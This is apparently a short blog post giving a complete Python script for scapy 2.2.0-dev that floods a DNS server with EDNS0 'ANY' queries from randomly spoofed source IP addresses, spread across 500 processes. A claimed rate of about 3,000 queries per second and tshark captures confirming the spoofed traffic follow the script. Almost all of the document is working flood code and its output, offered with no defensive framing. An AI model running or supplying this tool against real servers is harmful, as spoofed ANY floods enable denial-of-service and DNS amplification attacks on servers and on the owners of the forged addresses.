scapy 2.2.0-dev : send a lot of ANY EDN0 queries with spoofed IP by using scapy and multiprocessing module

Plese note that this script is for scapy 2.2.0-dev

# cat -n send_ANY_EDNS0.py     1  #!/usr/bin/env python     2  # -*- coding: utf-8 -*-     3     4  ###     5  # this script is for 2.2.0-dev     6  # this script can generate crafted EDNS0 foo.bar ANY queries with spoofed IP addresses     7  # tested with Python 2.7.4     8  ###     9    10  import multiprocessing    11  import logging    12  logging.getLogger("scapy.runtime").setLevel(logging.ERROR)    13    14  from scapy.all import *    15  import random    16  import string    17  import time    18    19  domain_string = string.ascii_lowercase + string.digits    20  target_server = "192.168.10.12"    21  interface_name = "br0"    22  target1 = "foo.bar"    23    24  # craft EDNS0 foo.bar ANY with spoofed IP addresses    25  def craft_DNS():    26          for j in range(0,100):    27                  packet3 = (IP(src=RandIP("10.0.0.0/8"), dst="%s" % target_server)/UDP(sport=RandShort(),dport=53)/DNS(rd=1L,id=RandShort(),qd=DNSQR(qname="%s" % target1, qtype="ALL", qclass="IN"), ar=DNSRROPT(rclass=4096)))    28                  send(packet3,verbose=False,loop=500,iface="%s" % interface_name)    29                  return    30    31  if __name__ == '__main__':    32          jobs = []    33          for i in range(500):    34                  p = multiprocessing.Process(target=craft_DNS)    35                  jobs.append(p)    36                  p.start()    37          p.terminate()

I was able to generate around 3,000 queries/sec with my machine, which depends on machine’s spec.

# tshark -r b.pcap | grep "query 0x" | head -5 Running as user "root" and group "root". This could be dangerous.  1 0.000000000 10.205.170.50 -> 192.168.10.12 DNS 78 Standard query 0x6d9d  ANY foo.bar  2 0.000008000 10.43.165.159 -> 192.168.10.12 DNS 78 Standard query 0x9b08  ANY foo.bar  5 0.000305000 10.127.169.156 -> 192.168.10.12 DNS 78 Standard query 0x82c3  ANY foo.bar  6 0.000315000 10.217.216.26 -> 192.168.10.12 DNS 78 Standard query 0x2120  ANY foo.bar  7 0.000320000  10.20.8.214 -> 192.168.10.12 DNS 78 Standard query 0x2cb8  ANY foo.bar

Questions: 1    Answer RRs: 0    Authority RRs: 0    Additional RRs: 1    Queries        foo.bar: type ANY, class IN            Name: foo.bar            Type: ANY (Request for all records)            Class: IN (0x0001)    Additional records        <Root>: type OPT            Name: <Root>            Type: OPT (EDNS0 option)            UDP payload size: 4096            Higher bits in extended RCODE: 0x0            EDNS0 version: 0            Z: 0x8000                Bit 0 (DO bit): 1 (Accepts DNSSEC security RRs)                Bits 1-15: 0x0 (reserved)            Data length: 0